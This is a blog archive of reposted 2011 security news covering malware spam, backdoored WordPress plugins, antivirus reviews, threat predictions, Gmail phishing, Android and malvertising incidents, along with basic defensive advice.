From the category archives:

Security Tips

How a free breakfast day at McDonalds can lead to malware danger

McDonald's Meal Malware

McDonald's Meal Malware

I don’t know if you’re the sort of person who wakes up in the morning, and the first thing you long for is a McDonalds’ breakfast – but if you are, you might just be exactly what malware authors are looking for.

Researchers at SophosLabs have seen a malicious email that has been spammed out across the world in the last couple of days pretending to come from McDonalds.

The email claims that the fast-food giant is offering free breakfasts in each and every of their many thousands of restaurants around the globe. Chances are that there are many people who would love the prospect of munching on a McDonalds first thing in the morning.

McMalware Email

McMalware Email

Part of the email reads as follows:

McDonalds invites you to The Free Breakfast Day which will take place on 26 June, 2011, in every cafe of ours.

Free Day’s menu!
- Ranch Snack Wrap (Crispy)
- Chicken Selects Premium Breast Strips
- Premium Caesar Salad with Grilled Chicken
- Strawberry Triple Thick Shake
- McCafe Hot Chocolate

Print the invitation card attached to the letter and show it at the cash desk of any of our restaurants.

But beware! There is no such thing as a free lunch… or breakfast.

The attached file is, of course, malicious. Sophos detects the ZIP file as Troj/BredoZp-DV and the Invitation_Card.exe file contained within as the Troj/Bredo-HU Trojan horse.

In an attempt to fool computer users into believing the file is safe, the EXE file has a Word icon.

Don’t forget – you should always be suspicious of unsolicited attachments sent to you via email!

http://nakedsecurity.sophos.com/2011/06/21/free-breakfast-day-mcdonalds-malware/

{ Comments on this entry are closed }

WordPress Warns Of Trojanized Plug-Ins, Urges Patching

Wordpress Security

Wordpress Security

Attackers added a back door to three plug-ins that were available for download from WordPress for more than 24 hours.

WordPress on Tuesday warned all users who run its software on their own servers to beware a trio of malicious plug-ins for its content management software, which may have been available for download from the site for more than 24 hours.

“Earlier today the WordPress team noticed suspicious commits to several popular plugins–AddThis, WPtouch, and W3 Total Cache–containing cleverly disguised backdoors. We determined the commits were not from the authors, rolled them back, pushed updates to the plugins, and shut down access to the plugin repository while we looked for anything else unsavory,” said a warning from Matt Mullenweg, founding developer of WordPress, released on Tuesday.

Plug-ins extend WordPress functionality, and the ones called out in the security warning offer an interface with social networking sites (AddThis), mobile and iPad versions of WordPress blogs (WPtouch), and server performance enhancements (W3 Total Cache). AddThis and W3 Total Cache have been downloaded at least 500,000 times, and the free version of WPtouch, more than two million times.

Mullenweg said that while an investigation is underway and there’s no evidence that attackers compromised the WordPress site, WordPress just to be safe has forcibly reset all passwords for WordPress.org, which is the site where users can download WordPress. “To use the forums, [development site] Trac, or commit to a plugin or theme, you’ll need to reset your password to a new one”–by using the log-in page–said Mullenweg.

Plug-ins extend WordPress functionality, and the ones called out in the security warning offer an interface with social networking sites (AddThis), mobile and iPad versions of WordPress blogs (WPtouch), and server performance enhancements (W3 Total Cache). AddThis and W3 Total Cache have been downloaded at least 500,000 times, and the free version of WPtouch, more than two million times.

Mullenweg said that while an investigation is underway and there’s no evidence that attackers compromised the WordPress site, WordPress just to be safe has forcibly reset all passwords for WordPress.org, which is the site where users can download WordPress. “To use the forums, [development site] Trac, or commit to a plugin or theme, you’ll need to reset your password to a new one”–by using the log-in page–said Mullenweg.

In addition, he said that any users of the three Trojanized plug-ins who updated them “in the past day” (meaning Monday or Tuesday) should upgrade those plug-ins immediately.

Plug-ins, malicious or otherwise, continue to account for an increasing number of vulnerabilities seen in applications, both on PCs (for example, with browsers) and in Web applications (such as WordPress). In terms of WordPress, plug-ins now account for 80% of all WordPress-related vulnerabilities, according to HP DVLabs.

But some plug-in vulnerabilities are worse than others. “Web-based backdoors can be extremely dangerous,” said Paul Ducklin, head of technology for Sophos in the Asia Pacific region, in a blog post. “If you’re a WordPress user, you’ll know that the WordPress platform includes a complete and powerful administration interface, password-protected, via a URL such as “site.example/wp-admin.” A WordPress backdoor might offer something with similar functionality, but using a different, unexpected, URL, and using a password known to the hacker, instead of to you.”

Another danger is that if attackers managed to steal WordPress passwords, they might attempt to use them to access other sites. According to Mullenweg, “as a user, make sure to never use the same password for two different services, and we encourage you not to reset your password to be the same as your old one.”

Unfortunately, password reuse remains rampant as numerous, recent attacks have shown, such as when LulzSec released stolen databases containing usernames and passwords–such as the release of 37,608 SonyPictures.com passwords, which researchers have cross-referenced with other leaked databases.

http://www.informationweek.com/news/security/vulnerabilities/231000230

{ Comments on this entry are closed }

The Best Antivirus Software in 2011, According to PC Magazine

The Best Antivirus Software in 2011

Best Antivirus Software, 2011

Antivirus vendors have included “2011″ in their product names since the summer of 2010. Now that the year 2011 has actually arrived it’s time for a new look at the whole collection. Several of the latest additions attempt to crank up protection by running two different antivirus engines, and some actually succeed. This batch also brings a new Editors’ Choice for free antivirus and a new shared Editors’ Choice for commercial antivirus.

As always, when I say “antivirus” I mean a utility that protects against all kinds of malicious software, not just viruses. Trojans, spyware, rootkits, keyloggers, adware, scareware – a proper antivirus must handle all of these.

Standalone or Suite?
Many of this year’s products blur the line between standalone antivirus and security suite. In the past the presence of a personal firewall has been one defining suite element; not any more. There’s a fully-functional firewall inside Panda Antivirus Pro 2011. eScan Anti-Virus 11 and McAfee AntiVirus Plus 2011 also offer firewall protection. Norton AntiVirus 2011 doesn’t include a complete firewall, but its intrusion prevention feature is more effective against exploits than most full-blown suites.

Spam filtering is another component typically found in a suite. The spam filter built into BullGuard Antivirus 10 is reasonably accurate and unusually helpful at setup time. eScan also offers a spam filter, but it’s not something you’d want to inflict on your Inbox.

StopSign Internet Security 1.0 includes an optional firewall with spam filtering built in. None of the independent labs have tested it, though, and its performance in my own malware blocking and removal tests was so poor that I didn’t bother evaluating those optional features.

BitDefender Antivirus Pro 2011 offers full remote management of other BitDefender installations across the network. McAfee can monitor other installations remotely and fix problems. Panda and Norton can at least let you know when another installation has problems, though they won’t fix those problems remotely.

BitDefender includes a very effective phishing prevention tool, as does G Data AntiVirus 2011. The LinkScanner component in AVG Anti-Virus Free 2011 also works to block phishing sites, as does McAfee’s SiteAdvisor. AVG and Norton both scan the links on your Facebook pages to protect you from Facebook scams and viruses. BitDefender and Kaspersky Anti-Virus 2011 both check your system for security vulnerabilities, though BitDefender takes the concept a bit farther.

Outpost Antivirus Pro 7.0 and BitDefender can block transmission of user-defined private data, a feature usually found only in suites. Ad-Aware Pro Internet Security 9.0, AVG, Kaspersky, and McAfee will tune system performance and wipe out traces of computer and Internet use. Sometimes it’s hard to remember that the product is “only” an antivirus, not a full suite.

The true standalone antivirus isn’t dead, however. For example, F-Secure Anti-Virus 2011 sticks to the business of virus protection without any sign of morphing into a mini-suite.

Twin-Engine Trend
Several late-season additions aim to double your protection by using two antivirus engines, with varying degrees of success. G Data’s dual scan doesn’t take much longer than the average single-engine product, and it includes powerful phishing protection. However, it doesn’t thoroughly clean up the threats it detects, and a failed cleanup effectively killed one test system. TrustPort Antivirus 2011 ran a bit slower than G Data and failed significantly in my testing. After its alleged removal some threats were still running. In the malware blocking test a few threats that it claimed to block managed to install and launch anyway.

Double Anti-Spy Professional v2 turned in the best performance of the twin-engine antivirus tools. It scans first with one engine, then with the other, and it also requires two separate updates. It’s noticeably slow, but effective enough that it’s worth waiting for.

Adjustable Interfaces, Built-in Support
Some users want to hear about every little security event, but most prefer a product that just does the job, without making a fuss. Ad-Aware Pro appeals to both with a choice of simple or advanced mode. BitDefender goes even further. Not only can its users choose basic, intermediate or expert view, they can build a personal collection of their most-used tools.

Webroot AntiVirus with Spy Sweeper 2011 totally focuses on keeping everything as simple as possible. It updates automatically, scans while the system is idle, and interacts with the user through a completely redesigned interface. All the detail a tech-savvy user might want is available, but hidden when not needed.

The user interface for Trend Micro Titanium Antivirus + 2011 discards the standard landscape-orientation window for a skinny vertical panel that takes up minimal space. McAfee, too, has switched to a vertical interface.

Norton reserves a panel across the bottom of its main window for interaction and communication with other security components. Initially the panel shows an interactive world map of security activity, but it can also connect with Norton Safe Web for Facebook or with your Norton Online Backup account.

Built-in and automated support features grace many of these tools. BitDefender includes a search box for help topics right on its main screen; a built-in tool will gather system information and contact an agent for chat-based support. Norton’s one-click support system gathers diagnostics and offers relevant FAQs or chat-based support. Kaspersky’s built-in support tool can send diagnostic reports to the company and process purpose-built scripts to fix specific problems. Panda’s PSCAN lets remote analysts request samples and push fixes without requiring full chat-type interaction. BullGuard offers built-in access to e-mail and live chat support with a message center to manage your support interactions. eScan links to live chat and online help.

[click to continue…]

{ Comments on this entry are closed }

Top 10 Security Threats for 2011

Top Ten Security Threats - 2011

Top Ten Security Threats

Imperva announced their predictions for the top ten security trends for 2011 which have been compiled to help IT security professionals defend their organization against the next onslaught of cyber security threats.

The trends have been detailed below:

1. Nation-sponsored hacking: When APT meets industrialization
Nation-sponsored hacking specifically-targeted cyber attacks will incorporate concepts and techniques from the commercial hacker industry. These campaigns will contain a different malware payload than the traditional attacks conducted for monetary gain. However, these attacks will use similar techniques. These Advanced Persistent Threat (APT) attacks will borrow techniques, such as automation and viral distribution, making them all the more powerful and potentially more successful. An example of such an attack is Stuxnet, which was not searching for data to monetize, rather it was focused on gaining control of crucial infrastructure.

Both classes of attack (hacker industry and APT) are going to use some of the same techniques so some security controls are applicable to both. On the positive side, given you’re covered against the cyber mafia you should have some of the controls to be protected from certain APT attacks. As APT is persistent, if a certain attack does not succeed, another one will come into play. The traditional security controls do not deter these relentless, state-sponsored hacker organizations. For the enterprise as well as government, this means increasing monitoring of traffic and setting security controls across all organization layers.


2. The insider threat is much more than you had imagined
In this upcoming year, we expect to see a growing awareness to security incidents of an “insider job” nature. Attention will grow as a consequence of an increased flow of incident reports where data theft and security breaches are tied to employees and other insiders. The cause of this trend will be the emphasis put on new regulations covering the act of notification and disclosure (rather on the actual protection of data).

To deter insider threats, organizations should therefore:

  • Enforce access controls such that access is based only a business need-to-know level. This includes eliminating excessive privileges.
  • Provide the proper access auditing tools to data centers. These auditing tools should monitor who accesses what data

3. Man in the Browser attacks will man up
Man in the Browser (MitB) attack sophistication is going to increase, as well as moving forward to more types of online applications. As a consequence, more online service providers are going to include this in their list of priorities for 2011, shifting the responsibility for mitigating the risk from the consumers to the service providers.

While avoiding infection by proxy Trojans is presumably the responsibility of consumers, MitB attacks are quickly becoming a concern of online service providers. The actual rate of infection and the proliferation of the many types of MitB malware suggest that providers must be able to serve (and protect) customers who might be infected with one type of malware or another. Just as the evolution of vehicle safety drove manufacturers to include device such as ABS, Air Bags and ESP, rather than rely on us to drive carefully, so will online service providers need to invest in mechanisms that allow them to conduct business with allegedly infected consumers. Among the technologies that we foresee as helpful are strong device identification, client profiling, fast security code evolution, session flow tracking and site-to-client authentication.

[click to continue…]

{ Comments on this entry are closed }

Amazon’s AWS Used to Spread Bank Data Malware

Amazon Web Services used to spread malware

Amazon Web Services used to spread malware

A Kaspersky researcher spies some malware hosted on AWS targeting bank data.

Cyber criminals have used Amazon Web Services (AWS) accounts to spread financial data-stealing malware, a security researcher has discovered.

The malware, hosted on AWS, appeared to have emanated from Brazil, as banks within the country were targeted, said Kaspersky Lab expert Dmitry Bestuzhev.

“The evidence indicates that the criminals behind the attack are from Brazil and they used several previously registered accounts to launch the infection,” Bestuzhev said in a blog post.

The malware spotted on AWS was able to do a variety of nasty things. As a rootkit, it attempted to disable four different anti-virus programs and a special security application used by Brazilian financial institutions for online banking.

It also attempted to steal financial data from nine Brazilian and two international banks, as well as acquire Microsoft Live Messenger credentials.

At the time of publication, Amazon had not confirmed whether the accounts used to spread the malware had been deactivated.

The findings came after some reports indicated hackers who hit Sony in April had used AWS as a platform.

Last month, Citrix chief technology officer (CTO) Simon Crosby claimed the public cloud was a safer place to store data than the private cloud.

The public cloud may also be a safer place for cyber criminals to operate, however.

“I believe legitimate cloud services will continue to be used by criminals for different kinds of cyber-attacks,” Bestuzhev added.

“Cloud providers should start thinking about better monitoring systems and expanding security teams in order to cut down on malware attacks enabled and launched from their cloud.”

Hackers could do well from using well known cloud services, as using a server with good repute will mean malware is less likely to be blocked by web filters.

From http://www.itpro.co.uk/634021/aws-used-to-spread-bank-data-malware

{ Comments on this entry are closed }

Google Says Hundreds Of Gmail Accounts Hijacked

Google Gmail Hacked

Google Gmail Hacked

An attack from China has affected hundreds of users, including senior U.S. government officials, Chinese political activists, officials in several Asian countries such as South Korea, military personnel, and journalists.

Google has detected a campaign to gather Gmail account credentials that appears to originate from Jinan, China, and is warning users to take a few minutes to review their security settings.

Eric Grosse, engineering director for Google’s security team, said in a blog post that hundreds of users have been affected, including senor U.S. government officials, Chinese political activists, officials in several Asian countries such as South Korea, military personnel, and journalists.

“The goal of this effort seems to have been to monitor the contents of these users’ emails, with the perpetrators apparently using stolen passwords to change peoples’ forwarding and delegation settings,” Grosse said.

By changing these settings, which are only evident through the appropriate Gmail Settings tab page, the attackers could generate copies of incoming and outgoing email that would be forwarded without the account holder’s knowledge.

Google declined to provide further details or information about those it believes may be behind the attack.

In January 2010, Google reported that it had uncovered “a highly sophisticated and targeted attack on our corporate infrastructure originating from China.” Google said at the time that it had reason to believe that one of the main goals of the attackers was to compromise the Gmail accounts of Chinese human rights activists.

In that respect, the attack was not very successful: While Google acknowledged that the attackers had stolen unspecified intellectual property, it stressed that only two Gmail accounts appeared to have been accessed.

Jinan, capital of Shandong Province in Eastern China, happens to be the location of the Lanxiang Vocational School, one of the two Chinese schools linked to the 2010 attack against Google.

An October 2009 report on Chinese cyber espionage prepared by defense contractor Northrop Grumman said that the Chinese military maintains at least six technical reconnaissance bureaus for gathering cyber intelligence in the Lanzhou, Jinan, Chengdu, Guangzhou, and Beijing military regions.

The current attack differs from the 2010 attack in that it doesn’t involve a vulnerability in Google’s infrastructure; it is simply a phishing campaign to dupe users into revealing their Gmail login credentials.


Google said that it detected the phishing campaign through its cloud-based security and abuse detection systems, through the reports from users, and through a report published in February on the Contagio blog, a collection of malware samples and threat analysis. The company said it has notified victims and the relevant government authorities.

Google is advising Gmail users to consider steps to improve the security of their accounts. The company recommends using two-factor verification, using a strong password, only entering account information at the proper Google domain, checking Gmail settings for unknown forwarding addresses or unauthorized account delegation, watching for suspicious account activity warnings, using Google Chrome, and reviewing security education materials available online.

{ Comments on this entry are closed }

Fake AV, SEO Poisoning Top Malware Threats

ZDNet's Scareware GuideAttackers increasingly focused on fake antivirus and black-hat SEO techniques to target victims on the Web in April.

The volume of malware continued to increase in April as online scammers and malware distributors took advantage of major events according to security experts. Fake antivirus software and poisoned image search links were particularly prevalent in April.

There were over 73,000 new variants of malware released daily in April, a 26 percent increase over April 2010, GFI Software found in its monthly analysis released May 16. Cyber-criminals exploited several high-profile events, including the U.K. Royal Wedding of Prince William and Kate Middleton, the Easter holiday, the anniversary of Yuri Gagarin becoming the first man in space and the release of President Barack Obama’s birth certificate.

Seven of the top 10 malware threats were Trojans, according to GFI’s top 10 malware list for the month. Trojan.Win32.Generic!BT, a generic malware classification that encompasses a variety of Trojans, continued to be the biggest threat, accounting for over 20 percent of total malware detected. The Zeus/Spyeye Trojan and fake antivirus were also part of the top 10. [click to continue…]

{ Comments on this entry are closed }

Google rolls out a security patch for Android to fix an encryption hole

Google Android Security

Google Android Security

Google is rolling out a security patch for Android that fixes a vulnerability reported to have affected 99 per cent of users.

The patch fixes an issue flagged by German security experts that could allow hackers to look at personal information in the Google calendar and contacts apps.

The University of Ulm researchers said that in Android 2.3.3 and earlier these apps transmitted unencrypted information to retrieve an authentication token, or Authtoken, from Google. This left an opening where criminals could steal the token through WiFi snooping.

Once a hacker had one of these Authtokens, they could use it for several days, accessing your private information and potentially impersonating an individual smartphone. In Android 2.3.4 this flaw is fixed, but it was mentioned that 99 per cent of Android users were still using versions 2.3.3 and earlier, which meant they were all at risk.

But now Google is updating all of the endangered handsets with a silent server-side patch that won’t require any action by Android users, forcing servers to use an encrypted HTTPS connection when syncing with a handset.

A Google spokesperson said, “We’re starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days.”

Sophos security consultant Graham Cluley praised Google’s actions but added, “Concerns still remain as to how easy it would be to fix a serious security vulnerability on the Android devices themselves, given that Google is so reliant on manufacturers and carriers to push out OS updates.”

from The Inquirer http://www.theinquirer.net

{ Comments on this entry are closed }

Top 10 Malware Threats reported by GFI Software for February

According to GFI Application, a trend observed since last summer continued, with lots of of the same types of Trojan horses continuing to dominate the threat landscape. GFI’s statistics revealed that Trojans made up three of the top 10 malware threats in February 2011. Topping the list, Trojans detected as Trojan.Win32.Generic!BT accounted for 22.97 percent of total detections, holding its spot as the number one threat.

GFI Application has announced the top 10 most prevalent malware threats for the month of February 2011 as detected by scans performed by its anti-malware solution, VIPRE Antivirus, & its antispyware gizmo, CounterSpy.

These Trojans are downloaders associated with rogue security programs known as Fake Antivirus application, sometimes known as “scareware”. One time they are on a use’s process, these programs perform a fake scan of a victim’s computer for malware then display false warnings that the machine is infected in an try to persuade victims to buy fake security application.

The top 10 results represent the number of times a specific malware infection was detected in the coursework of GFI’s VIPRE & CounterSpy scans that document back to GFI’s community of opt-in users. These threats are classified as moderate to extreme based on process of installation among other criteria established by GFI Labs.

Top 10 Detections for February 2011 as reported by GFI Software:

1
 Trojan.Win32.Generic!BT Trojan
22.97%
2
 Trojan-Spy.Win32.Zbot.gen Trojan
3.46%
3
 Trojan.Win32.Generic.pak!cobra Trojan
2.89%
4
 Zugo LTD (v) Adware
2.52%
5
 Fraudtool.Win32.Securityshield.ek!c (v) Trojan
2.00%
6
 Trojan.Win32.Generic!SB.0 Trojan
1.72%
7
 INF.Autorun (v) Trojan
1.66%
8
 Worm.Win32.Downad.Gen (v) Worm
1.48%
9
 Pinball Corporation (v) Adware
1.19%
10
 Exploit.PDF-JS.Gen (v) PDF exploit
0.83%

{ Comments on this entry are closed }

Google, Yahoo, And MySpace Ads May Infect Computers

Infected Search?

Infected Search?

Antivirus company Avast alleges that ads served by companies such as Google, Yahoo! and Fox, and published on websites such as the New York Times and TechCrunch, have included bad software that could infect your computer.

Users don’t even have to click the ads to be affected. Their browser gets infected just from loading the ads. CNet has the story.

The report allegs these companies’ ad platforms include exploits that allow malicious hackers to run a JavaScript exploit called JS:Prontexi.

Prontexi is a Trojan horse targeting Windows machines that looks for further vulnerabilities in software such as Adobe’s Reader and Acrobat, Java, QuickTime and Flash. It pops up fake antivirus warnings to trick you into installing further malware. The malware started spreading in late December. Since then, Avast has found it has infected more than 2.6 million computers. Almost 530,000 of those were from Yield Manager and more than 16,300 from DoubleClick.

The worst affected are Yahoo!’s Yield Manager, Fox Audience Network’s Firmserve.com and Google’s DoubleClick. Together, these networks serve over 50% of all internet ads. DoubleClick has been the least affected and Google has been the fastest at tackling the problem, according to CNet and Avast.

A Yahoo representative confirmed the report and said it was investigating the situation, but didn’t provide much information. “We have identified the creatives in question and are working to make sure they been deactivated in our system,” the company said in a statement.

“Yahoo is deeply committed to providing a high-quality experience for users, advertisers, and publishers. We expect our members to support and abide by our standards and guidelines around acceptable ad content and behavior,” the statement said. “On the rare occasion that an ad is served that is in conflict with our expectations and guidelines we take action to remove it as quickly as possible.”

A Google spokesman said the company had discovered malware in ads from DoubleClick on its own and halted them. “In this case, we stopped several of the ads in question on the same day, independent of this report,” he said.

{ Comments on this entry are closed }

← Previous Entries